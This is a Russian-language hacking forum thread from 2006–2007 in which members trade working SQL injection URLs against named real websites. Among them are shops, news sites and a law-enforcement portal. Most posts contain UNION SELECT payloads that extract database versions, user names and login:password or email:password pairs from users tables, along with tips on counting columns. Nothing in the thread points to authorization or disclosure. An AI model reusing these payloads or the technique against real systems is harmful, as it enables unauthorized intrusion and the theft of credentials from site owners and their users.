SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.promtractor.ru

    Трахторской заводег

    Code:
    http://www.promtractor.ru/products_show.php?section=-1+union+select+1,2,version(),4/*
     
  2. Dmcox

    Dmcox New Member

    Joined:
    18 Dec 2005
    Messages:
    9
    Likes Received:
    3
    Reputations:
    1
    HTML:
    http://loveradio.ru/ru/vote.shtml?vote_question_id=27%20AND%201=0
    HTML:
    http://loveradio.ru/ru/vote.shtml?vote_question_id=27'
    HTML:
    http://loveradio.ru/ru/main/forum/forum.shtml?fid=5'
    HTML:
    http://loveradio.ru/ru/main/forum/forum.shtml?fid=5%20and%201=0
    HTML:
    http://loveradio.ru/ru/main/horoscope/index.shtml?sign=aries'
     
  3. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.ecruins.com/bands.php?ID=21+order+by+1
     
  4. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.c82.net

    Code:
    http://www.c82.net/article.php?ID=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4/*
     
  5. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    нашол инэекцыю на
    http://www.eightrent.co.jp/shop/?id=-18+ORDER+BY+7--
    подобрал столбец, а когда делаю
    http://www.eightrent.co.jp/shop/?id=-18+UNION+SELECT+1,2,3,4,5,6,7
    ошыбка....(
     
  6. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    вавава

     
  7. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    уже говорил тебе - что когда применяеш order by ненужно ставить несуществующий id
     
    1 person likes this.
  8. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.know-house.ru

    Code:
    http://www.know-house.ru/card_firm.php?n_id=102'+union+select+1,2,user(),4,5,6,7+user/*
     
  9. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    немогу подобрать таблици =(

    http://privet.zp.ua/anketa.php3?part=1&id=-4708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
     
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://5mag.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,concat(email,char(58),pwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users+limit+1,1/*
     
    1 person likes this.
  11. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Snap >>
    http://privet.zp.ua/part4.php3?catid=1'

    мож здесь найдьош!)))
     
  12. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    думаешь, скрипты разные базы юзают? о_0
    ps: automatization.ru
    Code:
    http://www.automatization.ru/equip-db/device.php?id=-1+union+select+1,2,3,4,5,concat(login,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+user+limit+0,1/*
     
    1 person likes this.
  13. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    vechirka.kiev.ua

    Code:
    http://vechirka.kiev.ua/article.php?id_article=-1+union+select+1,concat(user(),char(58),database(),char(58),version()),3,4+user/*
     
    1 person likes this.
  14. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://wc2006.sport.com.ua/teams.phtml?id_team=-6+union+select+concat(password,0x3a,username)+from+users/*
     
  15. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    База то одна только вот занвание таблиц подобрать не могу
    http://privet.zp.ua/anketa.php3?part=1&id=-4708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23/*

    Поэтому толку нет мне кажеться из других мест биться
     
    1 person likes this.
  16. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    n1†R0x здесь маса вареантов он титулкы на главной до названия самого файла где призошла ошыбка... я имел виду в том что может быть какаято зацепка..) с всего етого
     
    1 person likes this.
  17. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.02.ru

    Правоохранительный Портал

    Code:
    http://www.02.ru/news/index.php?id_tn=-1
    Code:
    http://www.02.ru/news/index.php?id_tn=8&id_n=668-1
    Code:
    http://www.02.ru/news/index.php?id_tn=8&id_n=667'
     
    #1277 Ksander, 22 Mar 2007
    Last edited: 22 Mar 2007
    2 people like this.
  18. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Ксандер
    http://www.02.ru/news/index.php?id_tn=-2+union+select+1,2/*
    просто вывода нет =)
     
  19. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138

    Тоже это заметил, но думал это у меня глюкануло, значит нет=), даже конверт пробовал =))



    p.s. в процесе
    Code:
    http://www.soaw.org/new/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11
     
  20. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    [shop]
    Code:
    http://www.loversandfriends.nl/shop.php?id=-56+union+select+1,2,3,user(),database(),6,7,8,9,version(),11,12,13,14,15,16/*
    Code:
    http://www.webdesign-freelance.nl/webdesign-freelance-shop.php?id=-15%20UNION%20SELECT%201,convert(user()+using+latin1),3,4,convert(version()+using+latin1)/*
     
    #1280 XTErner, 22 Mar 2007
    Last edited: 22 Mar 2007
    1 person likes this.
Thread Status:
Not open for further replies.